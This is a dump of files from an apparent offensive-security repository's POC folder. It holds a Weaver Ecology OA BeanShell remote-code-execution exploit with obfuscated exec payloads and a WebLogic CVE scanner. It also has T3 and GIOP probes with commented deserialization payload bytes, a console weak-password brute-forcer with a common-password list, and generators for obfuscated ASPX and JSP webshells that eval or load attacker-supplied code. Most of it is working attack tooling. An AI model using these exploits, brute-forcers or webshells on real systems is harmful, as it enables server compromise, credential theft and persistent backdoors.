    On any exception the failure is printed and the exception *class* (not
    the instance) is returned, so callers receive either a title string or
    a type object and must be prepared for both shapes.
    """
    try:
        sink = Output('url_getTitle')
        fetcher = ExpRequest('url_getTitle', sink)
        fetcher.get(kwargs['url'], retry_time=1)
        return fetcher.title
    except Exception as e:
        print('请求 %s 出现异常 %s' % (kwargs['url'], e))
        return type(e)
15 |
16 | if __name__ == "__main__":
17 | pass
--------------------------------------------------------------------------------
/POC/Weaver-Ecology-OA_RCE-EXP.py:
--------------------------------------------------------------------------------
1 | #/usr/bin/python
2 | #coding:utf-8
3 | #Author:Ja0k
4 | #For Weaver-Ecology-OA_RCE
5 |
6 | import urllib3
7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
8 |
9 | import requests,sys
10 |
11 | headers = {
12 | 'Content-Type': 'text/xml; charset=utf-8',
13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
15 | 'Cache-Control': 'max-age=0',
16 | 'Content-Type': 'application/x-www-form-urlencoded',
17 | 'Upgrade-Insecure-Requests': '1',
18 | 'Content-Length': '578'
19 | }
20 |
21 | proxies= {'http':'http://127.0.0.1:8080'}
22 |
23 | print('[*]Usage: [URL]')
24 | def check(**kwargs):
25 | url = kwargs['url']
26 |
27 | Url_Payload1="/bsh.servlet.BshServlet"
28 | Url_Payload2="/weaver/bsh.servlet.BshServlet"
29 | Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
30 | Url_Payload4="/oa/bsh.servlet.BshServlet"
31 |
32 | Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
33 | Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
34 | Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
35 | for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
36 | url= url + Url_Payload
37 | for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
38 | try:
39 | http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
40 | #print http_response.status_code
41 | if http_response.status_code == 200:
42 | if ";" not in (http_response.content):
43 | if "Login.jsp" not in (http_response.content):
44 | if "Error" not in (http_response.content):
45 | print("{0} is a E-cologyOA_RCE Vulnerability").format(url)
46 | print("Server Current Username:{0}").format(http_response.content)
47 | return 1
48 | elif http_response.status_code == 500:
49 | print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ").format(url)
50 | return
51 | else:
52 | pass
53 | except Exception as e:
54 | print('出现错误: %s'%type(e))
55 | #print("异常对象的内容是%s"%e)
56 |
57 | print('target is not vulliabit')
58 | if __name__ == '__main__':
59 | for line in open(sys.argv[1]).readlines():
60 | url=line.strip()
61 | #check(url)
--------------------------------------------------------------------------------
/POC/WeblogicScan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # _*_ coding:utf-8 _*_
3 |
4 | '''
5 | ____ _ _ _ _ __ __ _
6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
10 |
11 | '''
12 | import sys
13 | import Weblogic.Console
14 | import Weblogic.CVE_2014_4210
15 | import Weblogic.CVE_2016_0638
16 | import Weblogic.CVE_2016_3510
17 | import Weblogic.CVE_2017_3248
18 | import Weblogic.CVE_2017_3506
19 | import Weblogic.CVE_2017_10271
20 | import Weblogic.CVE_2018_2628
21 | import Weblogic.CVE_2018_2893
22 | import Weblogic.CVE_2018_2894
23 | import Weblogic.CVE_2019_2725
24 | import Weblogic.CVE_2019_2729
25 |
26 | version = "1.3"
27 | banner='''
28 | __ __ _ _ _ ____
29 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __
30 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
31 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | |
32 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
33 | |___/
34 | By Tide_RabbitMask | V {}
35 | '''.format(version)
36 |
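def PocS(rip, rport):
    """Run each bundled WebLogic check against rip:rport, printing progress.

    Args:
        rip: target host, handed unchanged to the ``Weblogic.*`` modules.
        rport: target port, likewise.

    Every check runs inside its own try/except so one failing module never
    stops the rest.  The bare ``except:`` this replaces turned *any* failure
    — a refused connection, a timeout, an error inside the module — into a
    "not detected" line, so a scan that never reached the host read exactly
    like a clean negative; the exception is now printed under that line to
    keep the two apart (and Ctrl-C is no longer swallowed).
    """
    def run_check(start_msg, fail_msg, module, args):
        # The run() lookup stays inside the try, as before, so a module
        # without it is reported rather than raised.
        print(start_msg)
        try:
            module.run(*args)
        except Exception as exc:
            print(fail_msg)
            print("    reason: {!r}".format(exc))

    run_check('[*]Console path is testing...',
              "[-]Target Weblogic console address not found.",
              Weblogic.Console, (rip, rport))

    # (label, module, argument tuple) in report order.  CVE_2014_4210's run()
    # takes only host and port; the others also take a trailing 0, as the
    # original per-module calls did.
    first_batch = [
        ('CVE_2014_4210', Weblogic.CVE_2014_4210, (rip, rport)),
        ('CVE_2016_0638', Weblogic.CVE_2016_0638, (rip, rport, 0)),
        ('CVE_2016_3510', Weblogic.CVE_2016_3510, (rip, rport, 0)),
        ('CVE_2017_3248', Weblogic.CVE_2017_3248, (rip, rport, 0)),
        ('CVE_2017_3506', Weblogic.CVE_2017_3506, (rip, rport, 0)),
        ('CVE_2017_10271', Weblogic.CVE_2017_10271, (rip, rport, 0)),
    ]
    second_batch = [
        ('CVE_2018_2894', Weblogic.CVE_2018_2894, (rip, rport, 0)),
        ('CVE_2019_2725', Weblogic.CVE_2019_2725, (rip, rport, 0)),
        ('CVE_2019_2729', Weblogic.CVE_2019_2729, (rip, rport, 0)),
    ]

    for label, module, args in first_batch:
        run_check('[*]{} is testing...'.format(label),
                  '[-]{} not detected.'.format(label), module, args)

    # These two modules are imported but deliberately not driven from here.
    print('[*]CVE_2018_2628 need you check in yourself')
    print('[*]CVE_2018_2893 need you check in yourself')

    for label, module, args in second_batch:
        run_check('[*]{} is testing...'.format(label),
                  '[-]{} not detected.'.format(label), module, args)

    print("[*]Happy End,the goal is {}:{}".format(rip, rport))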
108 |
109 | print('[*]Usage: [IP] [PORT=7001]')
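def check(**kwargs):
    """Framework entry point: run PocS() against kwargs['url'].

    Args:
        url: target host (keyword).
        port: optional keyword; defaults to 8002, the value that was
            previously hard-coded here regardless of input.
    """
    url = kwargs['url']
    # The usage banner and __main__ both talk about a port, but this function
    # ignored it and always used int('8002'); honour one when it is supplied.
    port = int(kwargs.get('port', 8002))
    PocS(url, port)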
114 |
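if __name__ == '__main__':
    print(banner)
    print('Welcome To WeblogicScan !!!\nWhoami:rabbitmask.github.io')
    if len(sys.argv) < 3:
        print('Usage: python3 WeblogicScan [IP] [PORT]')
    else:
        url = sys.argv[1]
        port = int(sys.argv[2])
        # check() accepts keyword arguments only, so the former positional
        # call check(url, port) raised TypeError before any scan started.
        check(url=url, port=port)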
--------------------------------------------------------------------------------
/POC/Weblogic_GIOP.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket,ssl
3 | import struct
4 | from urllib.parse import urlparse
5 |
# Probe message sent on connect.  The hex appears to decode to a GIOP 1.2
# LocateRequest: magic "GIOP", version 1.2, flags 0, message type 3,
# body length 0x17, request id 2, addressed to the 11-byte object key
# "NameService".  Kept as hex so the bytes stay exact.
IIOP_headers = bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')
8 |
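def handleURL(url):
    """Split *url* into (hostname, port, socket) for the raw GIOP probe.

    Args:
        url: an http:// or https:// URL.  When it carries no port, 443 is
            used for https and 80 otherwise.

    Returns:
        (hostname, port, sock) where sock is an *unconnected* TCP socket,
        wrapped for TLS when the scheme is https.

    The scheme is taken from urlparse() rather than from substring tests
    on the whole URL (``"https" in url`` also matched a path or query that
    merely contained the word), and the deprecated ``ssl.wrap_socket`` —
    removed in Python 3.12 — is replaced by an explicit context.
    """
    parts = urlparse(url)
    hostname = parts.hostname
    port = parts.port
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if parts.scheme == "https":
        # Only the protocol banner is of interest, so the peer certificate is
        # not checked; this mirrors what the old ssl.wrap_socket() default did.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=hostname)
    return hostname, port, sock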
26 |
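def check(**kwargs):
    """Probe whether the target port answers a GIOP LocateRequest.

    Args:
        url: keyword argument; either an http(s):// URL (port defaults to
            80/443) or a bare ``host:port`` string.

    Returns:
        1 when the reply carries the ``GIOP`` magic, 0 when the port answers
        with anything else or the connection fails, None when the input has
        neither form.

    The original ended with ``return 0`` inside ``finally``, which overrides
    whatever the ``try`` body returned — so a positive result could never be
    reported to a caller.  The return value is now carried out of the block.
    """
    target = kwargs['url']
    if 'http' in target:
        hostname, port, sock = handleURL(target)
        server_address = (hostname, port)
    elif ':' in target:
        parts = target.split(":")
        server_address = (parts[0], int(parts[1]))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    else:
        print('输入错误, 请输入 URL链接 或者 IP:PORT !')
        return None
    print('[+] Connecting to %s port %s' % server_address)
    sock.settimeout(5)
    result = 0
    try:
        sock.connect(server_address)
        print('sending:\n%s' % IIOP_headers.decode("utf-8", "ignore"))
        sock.sendall(IIOP_headers)
        data = sock.recv(20)
        print('received:\n%s' % data.decode("utf-8", "ignore"))
        # The original re-sent the request after reading the reply; a server
        # that closes the connection once it has answered makes that second
        # send raise and turns a positive into a failure, so it is dropped.
        if b'GIOP' in data:
            print('%s 目标启用GIOP协议!' % server_address[0])
            result = 1
        else:
            print('%s 目标已禁用GIOP协议!' % server_address[0])
    except Exception as e:
        print(e)
    finally:
        sock.close()
    return result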
57 |
58 |
59 | #payloadObj = open(sys.argv[3],'rb').read()
60 |
61 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00'
62 | #payload=payload.encode()+payloadObj
63 |
64 | # adjust header for appropriate message length
65 | #payload=struct.pack('>I',len(payload)) + payload[4:]
66 |
67 | #print('[+] Sending payload...')
68 | #sock.send(payload)
69 | #data = sock.recv(1024)
70 | #print('received "%s"' % data)
--------------------------------------------------------------------------------
/POC/Weblogic_T3.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket,ssl
3 | import struct
4 | import binascii
5 | from urllib.parse import urlparse
6 |
7 | # Send headers
8 | T3_headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\nLP:DOMAIN\n\n'
9 | #十六进制发送
10 | T3_hex = binascii.unhexlify("74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a50553a74333a2f2f75732d6c2d627265656e733a373030310a0a00000583016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e6")
11 |
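def handleURL(url):
    """Split *url* into (hostname, port, socket) for the raw T3 probe.

    Args:
        url: an http:// or https:// URL.  When it carries no port, 443 is
            used for https and 80 otherwise.

    Returns:
        (hostname, port, sock) where sock is an *unconnected* TCP socket,
        wrapped for TLS when the scheme is https.

    The scheme is taken from urlparse() rather than from substring tests
    on the whole URL (``"https" in url`` also matched a path or query that
    merely contained the word), and the deprecated ``ssl.wrap_socket`` —
    removed in Python 3.12 — is replaced by an explicit context.
    """
    parts = urlparse(url)
    hostname = parts.hostname
    port = parts.port
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if parts.scheme == "https":
        # Only the protocol greeting is of interest, so the peer certificate is
        # not checked; this mirrors what the old ssl.wrap_socket() default did.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=hostname)
    return hostname, port, sock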
29 |
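def check(**kwargs):
    """Probe whether the target port answers the T3 hello handshake.

    Args:
        url: keyword argument; either an http(s):// URL (port defaults to
            80/443) or a bare ``host:port`` string.

    Returns:
        1 when the reply begins with ``HELO``, the greeting a WebLogic T3
        listener returns to this hello; 0 when the port answers with
        anything else or the connection fails; None when the input has
        neither form.

    The original printed the reply and returned nothing, so callers (and
    the sibling GIOP check, which does return 1/0) had no result to use;
    it also decoded the reply strictly, so a binary answer raised
    UnicodeDecodeError and was reported as an error.
    """
    target = kwargs['url']
    if 'http' in target:
        hostname, port, sock = handleURL(target)
        server_address = (hostname, port)
    elif ':' in target:
        parts = target.split(":")
        server_address = (parts[0], int(parts[1]))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    else:
        print('输入错误, 请输入 URL链接 或者 IP:PORT !')
        return None
    print('[+] Connecting to %s port %s' % server_address)
    sock.settimeout(5)
    result = 0
    try:
        sock.connect(server_address)
        print('sending:\n%s' % T3_headers)
        sock.sendall(T3_headers.encode())
        data = sock.recv(1024)
        # "ignore" instead of a strict decode: the reply is only echoed here.
        print('received:\n%s' % data.decode("utf-8", "ignore"))
        if data.startswith(b'HELO'):
            print('%s 目标启用T3协议!' % server_address[0])
            result = 1
        else:
            print('%s 目标已禁用T3协议!' % server_address[0])
    except Exception as e:
        print(e)
    finally:
        sock.close()
    return result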
54 |
55 | #payloadObj = open(sys.argv[3],'rb').read()
56 |
57 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00'
58 | #payload=payload.encode()+payloadObj
59 |
60 | # adjust header for appropriate message length
61 | #payload=struct.pack('>I',len(payload)) + payload[4:]
62 |
63 | #print('[+] Sending payload...')
64 | #sock.send(payload)
65 | #data = sock.recv(1024)
66 | #print('received "%s"' % data)
--------------------------------------------------------------------------------
/POC/Weblogic_weakPass.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 |
4 | print('[*]Usage: [IP] [7001]')
5 | def check(**kwargs):
6 | url = kwargs['url']
7 | port = int('80')
8 | """weak password"""
9 |
10 | pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem', 'weblogic123', 'Weblogic123']
11 | for user in pwddict:
12 | for pwd in pwddict:
13 | data = {
14 | 'j_username':user,
15 | 'j_password':pwd,
16 | 'j_character_encoding':'UTF-8'
17 | }
18 | req = requests.post('http://'+url+':'+str(port)+'/console/j_security_check', data=data, allow_redirects=False, verify=False, timeout=3)
19 |
20 | if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
21 | print('[+] WebLogic username: '+user+' password: '+pwd)
22 | return 1
23 | print('[-]don not have weakPass!')
24 | return
25 |
--------------------------------------------------------------------------------
/POC/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/POC/__init__.py
--------------------------------------------------------------------------------
/POC/js_examples/enpassword.js:
--------------------------------------------------------------------------------
/**
 * Client-side password encoding: hex_sha1(username + hex_sha1(passwordOrgin)),
 * returned as uppercase hex (hex_sha1 with a single argument selects uppercase).
 *
 * @param username
 * @param passwordOrgin  the plaintext password entered by the user
 * @return the encoded value that is sent in place of the password
 *
 * NOTE(review): this is a plain, unsalted SHA-1 composition with no work
 * factor — the output is a fixed function of (username, password) — so it is
 * an encoding for transport, not a substitute for server-side password hashing.
 **/
function encrypt(username, passwordOrgin) {
    var inner = hex_sha1(passwordOrgin);
    return hex_sha1(username + inner);
}
11 |
12 |
13 |
/*
 * Hex-encoded SHA-1 of the first argument.  Uppercase hex unless a second
 * argument is supplied, in which case that value selects the case (falsy
 * gives lowercase).  The named parameters are not read; dispatch is on the
 * raw argument count, exactly as before.
 *
 * NOTE(review): a call with no arguments does not fail — it silently hashes
 * the fixed string "aiact@163.com".  That looks like an upstream artefact
 * rather than a feature; worth confirming that no caller depends on it.
 */
function hex_sha1(s, hexcase) {
    var argc = arguments.length;
    var input = argc >= 1 ? arguments[0] : "aiact@163.com";
    var upper = argc >= 2 ? arguments[1] : true;
    return binb2hex(core_sha1(AlignSHA1(input)), upper);
}
26 | /**/
/*
 * Perform a simple self-test to see if the VM is working: compares the
 * lowercase hex_sha1("abc") with the published SHA-1 test vector for "abc".
 */
function sha1_vm_test() {
    var expected = "a9993e364706816aba3e25717850c26c9cd0d89d";
    var actual = hex_sha1("abc", false);
    return actual == expected;
}
33 | /**/
/*
 * Calculate the SHA-1 of an array of big-endian words, and a bit length
 *
 * blockArray: the padded message as 32-bit words, a whole number of
 * 16-word (512-bit) blocks — the shape AlignSHA1() produces.  Returns the
 * five chaining values [a, b, c, d, e] as signed 32-bit integers.
 */
function core_sha1(blockArray) {
    var x = blockArray; // already padded by AlignSHA1(); nothing is appended here
    var w = Array(80);  // 80-entry message schedule, rebuilt for every block
    // SHA-1 initial hash values written as signed 32-bit integers (the form
    // JS bitwise operators work in): 0x67452301, 0xEFCDAB89, 0x98BADCFE,
    // 0x10325476, 0xC3D2E1F0.
    var a = 1732584193;
    var b = -271733879;
    var c = -1732584194;
    var d = 271733878;
    var e = -1009589776;
    for (var i = 0; i < x.length; i += 16) { // one 512-bit block (16 x 32-bit words) per pass
        var olda = a;
        var oldb = b;
        var oldc = c;
        var oldd = d;
        var olde = e;
        for (var j = 0; j < 80; j += 1) { // 80 rounds per block
            if (j < 16) {
                w[j] = x[i + j];
            } else {
                // schedule expansion: w[t] = ROTL1(w[t-3] ^ w[t-8] ^ w[t-14] ^ w[t-16])
                w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1);
            }
            // T = ROTL5(a) + f_t(b, c, d) + e + w[t] + K_t, every add mod 2^32
            var t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)), safe_add(safe_add(e, w[j]), sha1_kt(j)));
            e = d;
            d = c;
            c = rol(b, 30);
            b = a;
            a = t;
        }
        // fold this block's result back into the chaining values
        a = safe_add(a, olda);
        b = safe_add(b, oldb);
        c = safe_add(c, oldc);
        d = safe_add(d, oldd);
        e = safe_add(e, olde);
    }
    return new Array(a, b, c, d, e);
}
72 | /**/
/*
 * Perform the appropriate triplet combination function for the current iteration
 * (the SHA-1 round function f_t): Ch for rounds 0-19, Parity for 20-39,
 * Maj for 40-59 and Parity again for 60-79.
 */
function sha1_ft(t, b, c, d) {
    var choose = (b & c) | ((~b) & d);
    var parity = b ^ c ^ d;
    var majority = (b & c) | (b & d) | (c & d);
    return t < 20 ? choose
         : t < 40 ? parity
         : t < 60 ? majority
         : parity;
}
89 | /**/
/*
 * Determine the appropriate additive constant for the current iteration
 * (the SHA-1 round constant K_t), as a signed 32-bit integer.
 */
function sha1_kt(t) {
    if (t < 20) {
        return 1518500249;   // 0x5A827999, rounds 0-19
    }
    if (t < 40) {
        return 1859775393;   // 0x6ED9EBA1, rounds 20-39
    }
    if (t < 60) {
        return -1894007588;  // 0x8F1BBCDC, rounds 40-59
    }
    return -899497514;       // 0xCA62C1D6, rounds 60-79
}
98 | /**/
/*
 * Add integers, wrapping at 2^32. This uses 16-bit operations internally
 * to work around bugs in some JS interpreters.
 * Each operand is split into a high and a low 16-bit half; the halves are
 * added separately with the carry passed between them, which gives
 * addition mod 2^32 without relying on a large 32-bit intermediate.
 */
function safe_add(x, y) {
    var lowSum = (x & 0xFFFF) + (y & 0xFFFF);              // low halves; carry-out lands in bit 16
    var highSum = (x >> 16) + (y >> 16) + (lowSum >> 16);   // high halves plus that carry
    return (highSum << 16) | (lowSum & 0xFFFF);
}
109 | /**/
/*
 * Bitwise rotate a 32-bit number to the left.
 * The unsigned shift (>>>) on the wrapped part keeps the vacated high bits
 * zero, so OR-ing the two halves together yields a clean rotation.
 */
function rol(num, cnt) {
    var shiftedLeft = num << cnt;
    var wrappedBits = num >>> (32 - cnt);
    return shiftedLeft | wrappedBits;
}
117 | /**/
/*
 * The standard SHA1 needs the input string to fit into a block
 * This function align the input string to meet the requirement:
 * characters are packed big-endian into 32-bit words, a single 0x80 byte is
 * appended, and the bit length is written into the last word of the final
 * 16-word block.
 *
 * NOTE(review): each character is taken via charCodeAt() and shifted into an
 * 8-bit lane, so code points above 255 overlap neighbouring bytes — the
 * result is only the standard SHA-1 for byte-sized (Latin-1/ASCII) input.
 */
function AlignSHA1(str) {
    var len = str.length;
    var nblk = ((len + 8) >> 6) + 1;   // blocks needed for data + 0x80 + 8-byte length
    var words = nblk * 16;
    var blks = new Array(words);
    var i;
    for (i = 0; i < words; i += 1) {
        blks[i] = 0;
    }
    for (i = 0; i < len; i += 1) {
        blks[i >> 2] |= str.charCodeAt(i) << (24 - (i & 3) * 8);
    }
    blks[len >> 2] |= 128 << (24 - (len & 3) * 8);
    blks[words - 1] = len * 8;
    return blks;
}
137 | /**/
/*
 * Convert an array of big-endian words to a hex string.
 * Each word yields eight hex digits, most significant byte first; hexcase
 * selects uppercase (truthy) or lowercase digits.
 */
function binb2hex(binarray, hexcase) {
    var digits = hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
    var out = [];
    var byteCount = binarray.length * 4;
    for (var i = 0; i < byteCount; i += 1) {
        var shift = (3 - (i % 4)) * 8;                  // byte position within its word
        var octet = (binarray[i >> 2] >> shift) & 0xFF;
        out.push(digits.charAt(octet >> 4) + digits.charAt(octet & 15));
    }
    return out.join("");
}
149 |
150 |
--------------------------------------------------------------------------------
/POC/js_examples/top100password.txt:
--------------------------------------------------------------------------------
1 | 123456789
2 | a123456
3 | 123456
4 | a123456789
5 | 1234567890
6 | woaini1314
7 | qq123456
8 | abc123456
9 | 123456a
10 | 123456789a
11 | 147258369
12 | zxcvbnm
13 | 987654321
14 | 12345678910
15 | abc123
16 | qq123456789
17 | 123456789.
18 | 7708801314520
19 | woaini
20 | 5201314520
21 | q123456
22 | 123456abc
23 | 1233211234567
24 | 123123123
25 | 123456.
26 | 0123456789
27 | asd123456
28 | aa123456
29 | 135792468
30 | q123456789
31 | abcd123456
32 | 12345678900
33 | woaini520
34 | woaini123
35 | zxcvbnm123
36 | 1111111111111111
37 | w123456
38 | aini1314
39 | abc123456789
40 | 111111
41 | woaini521
42 | qwertyuiop
43 | 1314520520
44 | 1234567891
45 | qwe123456
46 | asd123
47 | 000000
48 | 1472583690
49 | 1357924680
50 | 789456123
51 | 123456789abc
52 | z123456
53 | 1234567899
54 | aaa123456
55 | abcd1234
56 | www123456
57 | 123456789q
58 | 123abc
59 | qwe123
60 | w123456789
61 | 7894561230
62 | 123456qq
63 | zxc123456
64 | 123456789qq
65 | 1111111111
66 | 111111111
67 | 0000000000000000
68 | 1234567891234567
69 | qazwsxedc
70 | qwerty
71 | 123456..
72 | zxc123
73 | asdfghjkl
74 | 0000000000
75 | 1234554321
76 | 123456q
77 | 123456aa
78 | 9876543210
79 | 110120119
80 | qaz123456
81 | qq5201314
82 | 123698745
83 | 5201314
84 | 000000000
85 | as123456
86 | 123123
87 | 5841314520
88 | z123456789
89 | 52013145201314
90 | a123123
91 | caonima
92 | a5201314
93 | wang123456
94 | abcd123
95 | 123456789..
96 | woaini1314520
97 | 123456asd
98 | aa123456789
99 | 741852963
100 | a12345678
--------------------------------------------------------------------------------
/POC/webshell_asp.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%
7 |
17 |
18 | %>'''
19 |
20 |
21 |
22 | def random_name(len):
23 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
24 | return ''.join(random.sample(str,len))
25 |
26 | def build_webshell():
27 | FunctionName = random_name(4)
28 | parameter = random_name(4)
29 | FunctionName1 = random_name(4)
30 | shellc = shell.format(FunctionName,parameter,FunctionName1)
31 | return shellc
32 |
33 | def check(**kwargs):
34 | print (build_webshell())
35 |
36 |
37 | if __name__ == '__main__':
38 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_aspx.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%@ Page Language="Jscript" Debug=true%>
7 | <%
8 | var {0}=Request.Form["pureqh"];
9 | var {1}="unsa",{5}="fe",{4}={1}+{5};
10 | function {2}()
11 | {6}
12 | return {0};
13 | {7}
14 | function {3}()
15 | {6}
16 | eval({2}(),{4});
17 | {7}
18 | {3}()
19 | %>'''
20 |
21 |
22 |
23 | def random_name(len):
24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
25 | return ''.join(random.sample(str,len))
26 |
27 | def build_webshell():
28 | parameter = random_name(2)
29 | parameter1 = random_name(3)
30 | FunctionName = random_name(4)
31 | FunctionName1 = random_name(5)
32 | parameter2 = random_name(6)
33 | parameter3 = random_name(7)
34 | lef = '''{'''
35 | rig = '''}'''
36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
37 | return shellc
38 | def check(**kwargs):
39 | print (build_webshell())
40 |
41 | if __name__ == '__main__':
42 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_aspx_D.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%@ Page Language="Jscript" Debug=true%>
7 | <%
8 | function {2}()
9 | {6}
10 | var {0}=Request.Form["zero"];
11 | return {0};
12 | {7}
13 | function {3}()
14 | {6}
15 | var {1}="unsa",{5}="fe",{4}={1}+{5};
16 | eval({2}(),{4});
17 | {7}
18 | {3}()
19 | %>'''
20 |
21 |
22 |
23 | def random_name(len):
24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
25 | return ''.join(random.sample(str,len))
26 |
27 | def build_webshell():
28 | parameter = random_name(4)
29 | parameter1 = random_name(4)
30 | FunctionName = random_name(4)
31 | FunctionName1 = random_name(4)
32 | parameter2 = random_name(4)
33 | parameter3 = random_name(4)
34 | lef = '''{'''
35 | rig = '''}'''
36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
37 | return shellc
38 | def check(**kwargs):
39 | print (build_webshell())
40 |
41 | if __name__ == '__main__':
42 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_jsp.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%!class {2} extends ClassLoader{0} {2}(ClassLoader {3}){0} super({3}); {1}public Class g(byte []b){0} return super.defineClass(b,0,b.length); {1}{1}%><% String cls=request.getParameter("zero");if(cls!=null){0} new {2}(this.\u0067etClass().\u0067etClassLoader()).g(new sun.misc.{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}().decodeBuffer(cls)).newInstance().equals(pageContext); {1}%>
7 | '''
8 |
9 |
10 |
11 | def random_name(len):
12 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
13 | return ''.join(random.sample(str,len))
14 |
15 | def build_webshell():
16 | arr1 = ['\u0042','B']
17 | arr2 = ['\u0041','A']
18 | arr3 = ['\u0053','S']
19 | arr4 = ['\u0045','E']
20 | arr5 = ['\u0036','6']
21 | arr6 = ['\u0034','4']
22 | arr7 = ['\u0044','D']
23 | arr8 = ['\u0065','e']
24 | arr9 = ['\u0063','c']
25 | arr10 = ['\u006f','o']
26 | arr11 = ['\u0064','d']
27 | arr12 = ['\u0065','e']
28 | arr13 = ['\u0072','r']
29 |
30 | lef = '''{'''
31 | rig = '''}'''
32 | var1 = random_name(4)
33 | var2 = random_name(4)
34 | var3 = random.choice(arr1)
35 | var4 = random.choice(arr2)
36 | var5 = random.choice(arr3)
